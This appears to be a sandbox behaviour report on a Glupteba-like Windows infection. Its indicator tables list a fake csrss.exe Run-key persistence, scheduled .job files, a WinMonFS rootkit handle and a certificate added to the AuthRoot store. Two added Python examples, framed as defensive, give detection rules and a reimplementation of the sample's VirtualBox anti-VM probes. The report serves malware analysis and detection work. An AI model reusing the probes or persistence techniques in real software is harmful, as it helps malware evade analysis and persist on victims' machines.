File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
File opened for modification C:\Windows\Tasks\bdnnguwcOLBYKAjbbA.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\mRaseIvrfxDtBOYKW.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\eGwAoTnpAObQfPU.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\FTXCzbcEvROqagNdd.job C:\Windows\SysWOW64\schtasks.exe N/A
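Added example, not code from the sandbox or from the sample: detection logic for the persistence chain the rows above record (Run value "csrss" pointing at C:\Windows\rss\csrss.exe, the csrss.exe and windefender.exe drops under C:\Windows, the \??\WinMonFS handle, Startup-folder .bat files written by msbuild.exe, and .job files created by schtasks.exe), run over Sysmon-style event records. The event schema (type/image/key/data/target) and SAMPLE_EVENTS are constructed from the indicator rows on this page rather than exported from a real sensor; INJECTION_HOSTS extends the two hosts seen here (msbuild.exe, RegAsm.exe) with RegSvcs.exe and InstallUtil.exe as an assumption. The masquerade is worth spelling out for whoever writes the real rule: the genuine csrss.exe lives in System32, is started by smss.exe and is never registered under a Run key, and the submitted file itself was named sihost.exe.

```python
"""Detection logic for the Glupteba persistence chain recorded in this report,
run over Sysmon-style event records. Added example: the event schema
(type/image/key/data/target) and SAMPLE_EVENTS are constructed from the
indicator rows on this page, not exported from a real sensor."""
from collections import defaultdict

# Artifacts lifted from the report (compared case-insensitively).
RSS_CSRSS = "c:\\windows\\rss\\csrss.exe"          # masquerades as System32\csrss.exe
RSS_DIR = "c:\\windows\\rss\\"
WINDEFENDER = "c:\\windows\\windefender.exe"
RUN_KEY_SUFFIX = "\\software\\microsoft\\windows\\currentversion\\run\\csrss"
STARTUP_DIR = "\\start menu\\programs\\startup\\"
TASKS_DIR = "c:\\windows\\tasks\\"
# msbuild.exe and RegAsm.exe are the hosts seen on this page; RegSvcs/InstallUtil
# are an assumption (same .NET LOLBin family), not taken from the report.
INJECTION_HOSTS = {"msbuild.exe", "regasm.exe", "regsvcs.exe", "installutil.exe"}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return [(rule_name, severity), ...] for one event; [] when nothing matches."""
    hits = []
    kind, img = event["type"], basename(event.get("image", ""))
    if kind == "registry_set":
        key, data = event["key"].lower(), event.get("data", "").lower()
        # Run value literally named "csrss" whose data points outside System32
        if key.endswith(RUN_KEY_SUFFIX) and RSS_CSRSS in data:
            hits.append(("run_key_fake_csrss", "high"))
    elif kind == "file_create":
        target = event["target"].lower()
        if target.startswith(RSS_DIR) or target == WINDEFENDER:
            hits.append(("drop_windows_rss_or_windefender", "high"))
        # Startup-folder write by a .NET build/registration utility
        if STARTUP_DIR in target and img in INJECTION_HOSTS:
            hits.append(("startup_write_by_lolbin", "high"))
        if target.startswith(TASKS_DIR) and target.endswith(".job") and img == "schtasks.exe":
            hits.append(("legacy_job_file_created", "medium"))
    elif kind == "handle_open":
        # Handle to the WinMonFS device object used by the rootkit component
        if event["target"].lower().endswith("\\winmonfs"):
            hits.append(("winmonfs_device_handle", "critical"))
    return hits


def correlate(events):
    """Group hits by process image so the chain is visible per binary."""
    by_image = defaultdict(list)
    for ev in events:
        for hit in evaluate(ev):
            by_image[ev["image"]].append(hit)
    return dict(by_image)


# Constructed from the report's indicator rows; the last record is a benign control.
SID = "S-1-5-21-399997616-3400990511-967324271-1000"
SAMPLE_EVENTS = [
    {"type": "registry_set", "image": "C:\\Users\\Admin\\Pictures\\rfVcCs84JgkadF5csIFA6eOA.exe",
     "key": f"HKU\\{SID}\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\csrss",
     "data": "\"C:\\Windows\\rss\\csrss.exe\""},
    {"type": "file_create", "image": "C:\\Users\\Admin\\Pictures\\rfVcCs84JgkadF5csIFA6eOA.exe",
     "target": "C:\\Windows\\rss\\csrss.exe"},
    {"type": "file_create", "image": "C:\\Windows\\rss\\csrss.exe",
     "target": "C:\\Windows\\windefender.exe"},
    {"type": "handle_open", "image": "C:\\Windows\\rss\\csrss.exe", "target": "\\??\\WinMonFS"},
    {"type": "file_create", "image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe",
     "target": "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\6C5vrw9HlmBbodwnSru7JCve.bat"},
    {"type": "file_create", "image": "C:\\Windows\\SysWOW64\\schtasks.exe",
     "target": "C:\\Windows\\Tasks\\bdnnguwcOLBYKAjbbA.job"},
    {"type": "file_create", "image": "C:\\Windows\\explorer.exe",   # benign: user-created shortcut
     "target": "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\notes.lnk"},
]

if __name__ == "__main__":
    for image, hits in correlate(SAMPLE_EVENTS).items():
        print(image)
        for rule, severity in hits:
            print(f"  [{severity}] {rule}")
```

The explorer.exe record produces no hit, which is the point of keying the Startup rule on the writing image rather than on the folder alone; a rule that fires on every Startup write is unusable on a real estate.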

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\un4.0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\un4.0.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS9579.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS9579.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zSC0FE.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zSC0FE.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
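Added example, not the sample's code: the anti-VM probes this report attributes to the dropped binaries (the HARDWARE\ACPI\DSDT\VBOX__ key, the VideoBiosVersion and SystemBiosVersion values, the BIOS\SystemProductName value, and the \??\VBoxMiniRdrDN device opened by three of the Pictures\*.exe droppers), reimplemented so a sandbox operator can confirm those artifacts are hidden before detonating anything. The artifact list comes from the indicator rows on this page; the substrings matched against each value and the constructed fake guest (FAKE_VBOX_*) are assumptions about a stock VirtualBox VM. Accessors are injected so the logic runs off-Windows; on Windows the real winreg and CreateFileW accessors are used.

```python
"""Re-implements the VirtualBox / BIOS probes this sample performs against the
registry and device namespace. Added example; the artifact list comes from the
report's indicator rows, the expected substrings and the fake guest below are
assumptions about a stock VirtualBox VM."""
import sys

# (key under HKLM, value name or None for a key-exists probe, substring that betrays VirtualBox)
REGISTRY_PROBES = [
    ("HARDWARE\\ACPI\\DSDT\\VBOX__", None, None),                            # key opened by the sample
    ("HARDWARE\\DESCRIPTION\\System", "VideoBiosVersion", "VIRTUALBOX"),
    ("HARDWARE\\DESCRIPTION\\System", "SystemBiosVersion", "VBOX"),
    ("HARDWARE\\DESCRIPTION\\System\\BIOS", "SystemProductName", "VIRTUALBOX"),
]
DEVICE_PROBES = ["\\\\.\\VBoxMiniRdrDN"]   # the report shows \??\VBoxMiniRdrDN opened read-only


def probe(key_exists, read_value, device_exists):
    """Run every probe through injected accessors and return the list of hits.
    Injection keeps the logic runnable off-Windows and lets a cleaned VM be
    checked with the real accessors below."""
    hits = []
    for key, value, needle in REGISTRY_PROBES:
        if value is None:
            if key_exists(key):
                hits.append(f"HKLM\\{key} exists")
            continue
        data = read_value(key, value)
        if data is None:
            continue
        # SystemBiosVersion / VideoBiosVersion are REG_MULTI_SZ: winreg returns a list
        text = " ".join(data) if isinstance(data, (list, tuple)) else str(data)
        if needle in text.upper():
            hits.append(f"HKLM\\{key}\\{value} contains {needle}")
    for dev in DEVICE_PROBES:
        if device_exists(dev):
            hits.append(f"device {dev} is present")
    return hits


def windows_accessors():
    """Real accessors: winreg for HKLM, CreateFileW for the device object."""
    import ctypes, winreg
    k32 = ctypes.windll.kernel32
    k32.CreateFileW.restype = ctypes.c_void_p
    invalid = ctypes.c_void_p(-1).value   # INVALID_HANDLE_VALUE as an unsigned int

    def key_exists(key):
        try:
            winreg.CloseKey(winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key))
            return True
        except OSError:
            return False

    def read_value(key, value):
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key) as k:
                return winreg.QueryValueEx(k, value)[0]
        except OSError:
            return None

    def device_exists(name):
        GENERIC_READ, OPEN_EXISTING = 0x80000000, 3
        h = k32.CreateFileW(name, GENERIC_READ, 0, None, OPEN_EXISTING, 0, None)
        if h == invalid:
            return False
        k32.CloseHandle(ctypes.c_void_p(h))
        return True

    return key_exists, read_value, device_exists


# Constructed stand-in for a stock VirtualBox guest (values are assumptions).
FAKE_VBOX_KEYS = {"HARDWARE\\ACPI\\DSDT\\VBOX__"}
FAKE_VBOX_VALUES = {
    ("HARDWARE\\DESCRIPTION\\System", "VideoBiosVersion"): ["Oracle VM VirtualBox Version 7.0.0 VGA BIOS"],
    ("HARDWARE\\DESCRIPTION\\System", "SystemBiosVersion"): ["VBOX   - 1"],
    ("HARDWARE\\DESCRIPTION\\System\\BIOS", "SystemProductName"): "VirtualBox",
}
FAKE_VBOX_DEVICES = {"\\\\.\\VBoxMiniRdrDN"}


def probe_fake(keys=FAKE_VBOX_KEYS, values=FAKE_VBOX_VALUES, devices=FAKE_VBOX_DEVICES):
    """Run the probes against the constructed guest instead of the live machine."""
    return probe(lambda k: k in keys, lambda k, v: values.get((k, v)), lambda d: d in devices)


if __name__ == "__main__":
    found = probe(*windows_accessors()) if sys.platform == "win32" else probe_fake()
    print("\n".join(found) or "no VirtualBox artifacts found")
```

An empty result on the analysis VM only means these five artifacts are hidden; the sample also reads Control Panel\International\Geo\Nation, EnableLUA and ProcessorNameString, and a guest that hides the VBOX strings but still reports a single virtual CPU or a sandbox default locale may be fingerprinted by those instead.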

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time" C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-501 = "Nepal Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-891 = "Morocco Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time" C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-42 = "E. South America Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-302 = "Romance Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time" C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2531 = "Chatham Islands Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-401 = "Arabic Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-622 = "Korea Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time" C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time" C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac3
4405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 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 C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\un4.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\un4.0.exe N/A
